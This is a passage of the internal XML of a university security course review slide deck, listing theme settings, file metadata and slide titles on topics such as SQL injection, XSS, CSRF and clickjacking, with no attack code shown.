          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:miter lim="800000"/>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chor="t" anchorCtr="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr sz="3200" dirty="0" smtClean="0"/>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_template">
  <a:themeElements>
    <a:clrScheme name="Custom 3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFE"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="990000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFE"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A32D1F"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47932"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A32D1F"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="595A5A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="009446"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="936241"/>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outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="35000"/>
            </a:srgbClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="28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11963</TotalTime>
  <Words>2423</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>479</Paragraphs>
  <Slides>79</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79</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="89" baseType="lpstr">
      <vt:lpstr>ＭＳ ゴシック</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Zapf Dingbats</vt:lpstr>
      <vt:lpstr>template</vt:lpstr>
      <vt:lpstr>1_template</vt:lpstr>
      <vt:lpstr>Course Review</vt:lpstr>
      <vt:lpstr>A message from David</vt:lpstr>
      <vt:lpstr>This Class: Introduction to the Four Research Cornerstones of Security</vt:lpstr>
      <vt:lpstr>Software Security</vt:lpstr>
      <vt:lpstr>Control Flow Hijacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Theory Breakdown</vt:lpstr>
      <vt:lpstr>Goals</vt:lpstr>
      <vt:lpstr>Network Security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Logistics</vt:lpstr>
      <vt:lpstr>Homework 3 Graded</vt:lpstr>
      <vt:lpstr>Coolest Bug Contest Winners</vt:lpstr>
      <vt:lpstr>Exam 3</vt:lpstr>
      <vt:lpstr>Exam 3 Mechanics</vt:lpstr>
      <vt:lpstr>The Most Important Things</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Parameterized Queries with Bound Parameters</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lacing JavaScript</vt:lpstr>
      <vt:lpstr>Lacing JavaScript</vt:lpstr>
      <vt:lpstr>“Reflected” XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>“Stored” XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>“Frontier Sanitization”</vt:lpstr>
      <vt:lpstr>Context-Specific Sanitization</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Referrer Validation</vt:lpstr>
      <vt:lpstr>How does the “Like” button work?</vt:lpstr>
      <vt:lpstr>IFrames</vt:lpstr>
      <vt:lpstr>How does the “Like” button work?</vt:lpstr>
      <vt:lpstr>Using Frames for Evil</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Framebusting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Detection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vt:lpstr>
      <vt:lpstr>Calculating Bayesian Detection Rate</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Practice Questions</vt:lpstr>
      <vt:lpstr>Which of the following helps prevent CSRF attacks? </vt:lpstr>
      <vt:lpstr>In his guest lecture, Professor Christin described a technique for using compromised servers to sell unlicensed drugs online without being detected. These compromised servers typically behaved normally, except when visitors reached the site by looking for certain terms on a search engine. How could the site tell when it was visited from a search engine? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>In class, we discussed how new HTTP headers have been created to address web security concerns, including the “Origin” header for Cross-Site Request Forgery and the “X-Frame-Options” header to stop pages form being framed.  What is one advantage and one disadvantage of using HTTP headers to solve web security issues? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>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Darpa Presentation</dc:title>
  <dc:creator>ed</dc:creator>
  <cp:lastModifiedBy>Jonathan Burket</cp:lastModifiedBy>
  <cp:revision>4521</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-02T18:57:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-02T21:16:33Z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false</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Google.Documents.DocumentId">
    <vt:lpwstr>11L1CS3lWunNfTuci5gPLtht4ZjOn7gyfIKyZn-f7p20</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Google.Documents.RevisionId">
    <vt:lpwstr>13701622749194124332</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Google.Documents.PreviousRevisionId">
    <vt:lpwstr>17594234182614114890</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Google.Documents.PluginVersion">
    <vt:lpwstr>2.0.2424.7283</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="Google.Documents.MergeIncapabilityFlags">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>